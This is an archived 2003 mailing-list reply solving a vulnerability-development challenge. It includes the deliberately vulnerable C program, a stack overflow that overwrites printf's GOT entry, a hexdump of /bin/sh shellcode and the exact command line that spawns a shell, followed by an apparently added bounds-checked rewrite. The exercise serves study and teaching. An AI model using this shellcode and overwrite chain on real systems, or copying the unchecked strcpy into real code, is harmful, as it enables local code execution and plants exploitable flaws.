Vulnerability Development mailing list archives
Re: [Vuln-dev Challenge] Challenge #2
From: Jason_Royes <jroyes () da-experts com>
Date: 24 May 2003 01:05:54 -0400
Strategy was to overwrite printf pointer with shellcode address.

1) Overwrite pointer held in bfp with strcpy(buf, argv[1]).

   before: [buf][bfp][ret]
   after:  [buf][&printf - 2][ret]

   Subtract 2 from printf addr to compensate for ";;%s;;" in fprintf

2) Overwrite printf function pointer with argv[2], fgets(bfp, BFSIZE, f1),
   f1 contains address of argv[1] or buf.

3) printf is then called which gives a shell.

Note that a BFSIZE of 90 actually allocates 92 bytes on the stack.

/* vulndev2.c */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define BFSIZE 90

int main(int argc, char *argv[])
{
    char *bfp;
    char buf[BFSIZE];
    FILE *f1;

    if (argc != 3)
        return 1;

    if ( (bfp = malloc(BFSIZE)) == NULL)
        return 1;

    /* debug */
    printf("bfp = %p, buf = %p\n", bfp, buf);

    /* log input */
    if ( (f1 = fopen("db.log", "a+")) == NULL)
        return 1;
    fprintf(f1, ";;%s;;", argv[2]);
    fclose(f1);

    strcpy(buf, argv[1]);

    /* read log */
    if ( (f1 = fopen("db.log", "r")) == NULL)
        return 1;
    if (fgets(bfp, BFSIZE, f1) == NULL)
        return 1;

    printf("%s\n", bfp);
    fclose(f1);

    exit(1);
}

##

jroyes@tadpole:~/study/vuln-dev/cha2$ objdump -R vd2

vd2:     file format elf32-i386

DYNAMIC RELOCATION RECORDS
OFFSET   TYPE              VALUE
08049874 R_386_GLOB_DAT    __gmon_start__
08049848 R_386_JUMP_SLOT   __register_frame_info
0804984c R_386_JUMP_SLOT   fprintf
08049850 R_386_JUMP_SLOT   malloc
08049854 R_386_JUMP_SLOT   __deregister_frame_info
08049858 R_386_JUMP_SLOT   fgets
0804985c R_386_JUMP_SLOT   __libc_start_main
08049860 R_386_JUMP_SLOT   printf
08049864 R_386_JUMP_SLOT   fclose
08049868 R_386_JUMP_SLOT   exit
0804986c R_386_JUMP_SLOT   fopen
08049870 R_386_JUMP_SLOT   strcpy

jroyes@tadpole:~/study/vuln-dev/cha2$ hexdump -C tiny.shell
00000000  31 db 31 c9 b0 46 cd 80  31 c0 50 68 2f 73 68 ff  |1.1..F..1.Ph/sh.|
00000010  88 44 24 03 68 2f 62 69  6e 89 e3 50 53 89 e1 31  |.D$.h/bin..PS..1|
00000020  d2 b0 0b cd 80                                    |.....|
00000025

jroyes@tadpole:~/study/vuln-dev/cha2$ ./vd2 `perl -e 'print "A"x55'``cat tiny.shell``printf "\x5e\x98\x04\x08"` `printf "\x6c\xfa\xff\xbf"`
bfp = 0x8049898, buf = 0xbffffa6c
sh-2.05a$ exit
jroyes@tadpole:~/study/vuln-dev/cha2$

##

Thanks to sin for the tiny shellcode.

On Fri, 2003-05-23 at 18:13, Dave McKinney wrote:
> We are announcing the second challenge. Initially, we wanted to have this
> out a few days ago but were involved in testing it on multiple platforms.
>
> This challenge is a little easier than the first one, since we'd like to
> see more people attempting to produce a proof-of-concept. If you find it
> too easy, you're welcome to attempt it in an environment with a
> non-executable stack/heap to raise the bar a little.
>
> Here's a link to the basic guidelines (for those who missed it):
> http://www.securityfocus.com/archive/82/321615/2003-05-13/2003-05-19/0
>
> (also, please retain the [Vuln-dev Challenge] string in the subject line
> for replies to make for easier filtering for those not interested in
> challenge related discussion.)
>
> ---
> /* vulndev2.c */
> #include <stdio.h>
> #include <stdlib.h>
> #include <string.h>
>
> #define BFSIZE 90
>
> int main(int argc, char *argv[])
> {
>     char *bfp;
>     char buf[BFSIZE];
>     FILE *f1;
>
>     if (argc != 3)
>         return 1;
>
>     if ( (bfp = malloc(BFSIZE)) == NULL)
>         return 1;
>
>     /* log input */
>     if ( (f1 = fopen("db.log", "a+")) == NULL)
>         return 1;
>     fprintf(f1, ";;%s;;", argv[2]);
>     fclose(f1);
>
>     strcpy(buf, argv[1]);
>
>     /* read log */
>     if ( (f1 = fopen("db.log", "r")) == NULL)
>         return 1;
>     if (fgets(bfp, BFSIZE, f1) == NULL)
>         return 1;
>
>     printf("%s\n", bfp);
>     fclose(f1);
>
>     exit(1);
> }
> ---
>
> Dave McKinney
> Symantec
> keyID: BF919DD7
> key fingerprint = 494D 6B7D 4611 7A7A 5DBB 3B29 4D89 3A70 BF91 9DD7
-- 
Jason Royes
Data Access Experts
http://www.da-experts.com/
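The post's whole chain depends on one defect: strcpy(buf, argv[1]) writes past the 90-byte stack buffer into the bfp pointer that sits next to it, after which the bounded fgets becomes a write to an attacker-chosen address. The following is an added example, not code from this thread or from the challenge author, showing the same program flow with both copies bounds-checked so that neither buf nor the log line can overrun its buffer. The function names copy_arg, build_log_entry and handle_input are hypothetical; the log line is built in memory rather than through db.log so the example runs without touching the filesystem.

```c
/* Added example (not from the original thread): bounds-checked rewrite
 * of the two copies in vulndev2.c. Function names are hypothetical. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define BFSIZE 90

/* Replacement for strcpy(buf, argv[1]). The copy is refused, not silently
 * truncated, when src plus its terminator does not fit in dst_len bytes,
 * so buf can never run into the adjacent bfp pointer or return address.
 * Returns 0 on success, -1 when the input is too long. */
int copy_arg(char *dst, size_t dst_len, const char *src)
{
    size_t n = strlen(src);
    if (n >= dst_len) {
        dst[0] = '\0';
        return -1;
    }
    memcpy(dst, src, n + 1);
    return 0;
}

/* Replacement for fprintf(f1, ";;%s;;", argv[2]) followed by the
 * fgets(bfp, BFSIZE, f1) read-back: the line is built with snprintf into
 * a buffer of the same size that will later hold it, so an entry that
 * would not survive the read intact is rejected up front.
 * Returns the line length, or -1 if it would have been truncated. */
int build_log_entry(char *dst, size_t dst_len, const char *entry)
{
    int n = snprintf(dst, dst_len, ";;%s;;", entry);
    if (n < 0 || (size_t)n >= dst_len) {
        dst[0] = '\0';
        return -1;
    }
    return n;
}

/* The program's flow with both checks applied. Returns 0 on success,
 * 1 if arg1 would overflow buf, 2 if arg2 would not fit in the log line.
 * log_out receives the line that would have been written and read back. */
int handle_input(const char *arg1, const char *arg2,
                 char *log_out, size_t log_len)
{
    char buf[BFSIZE];

    if (copy_arg(buf, sizeof buf, arg1) != 0)
        return 1;
    if (build_log_entry(log_out, log_len, arg2) < 0)
        return 2;
    return 0;
}

int main(int argc, char *argv[])
{
    char line[BFSIZE];
    int rc;

    if (argc != 3)
        return 1;

    rc = handle_input(argv[1], argv[2], line, sizeof line);
    if (rc != 0) {
        fprintf(stderr, "rejected input (code %d)\n", rc);
        return 1;
    }
    printf("%s\n", line);
    return 0;
}
```

The choice to reject rather than truncate is deliberate: strncpy-style truncation keeps the process alive but can drop the terminator or hide that an input was hostile, whereas an explicit failure code is something a caller can log and a monitor can alert on. With BFSIZE at 90, copy_arg accepts at most 89 characters and build_log_entry at most 85, since ";;" and ";;" take the other four bytes of the line.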
Current thread:
- [Vuln-dev Challenge] Challenge #2 Dave McKinney (May 23)
- Re: [Vuln-dev Challenge] Challenge #2 Thomas Cannon (May 24)
- Re: [Vuln-dev Challenge] Challenge #2 (SPOILER) Joel Eriksson (May 24)
- Re: [Vuln-dev Challenge] Challenge #2 (SPOILER) Joel Eriksson (May 24)
- Re: [Vuln-dev Challenge] Challenge #2 Jason_Royes (May 24)
- [Vuln-dev Challenge] nonexec stack&heap solution (encrypted) Jose Ronnick (May 24)
- Re: [Vuln-dev Challenge] Challenge #2 anon (May 24)
- Re: [Vuln-dev Challenge] Challenge #2 spacewalker (May 24)
- Re: [Vuln-dev Challenge] Challenge #2 Jose Ronnick (May 24)
- Re: [Vuln-dev Challenge] Challenge #2 Janus N. (May 24)
- Re: [Vuln-dev Challenge] Challenge #2 Diode Trnasistor (May 26)
- Re: [Vuln-dev Challenge] Challenge #2 Janus N. (May 26)
- Re: [Vuln-dev Challenge] Challenge #2 Robert Hogan (May 30)
- Re: [Vuln-dev Challenge] Challenge #2 Janus N. (May 30)
- Re: [Vuln-dev Challenge] Challenge #2 Diode Trnasistor (May 26)
- Gera's Insecure Programing abo7 sin (May 30)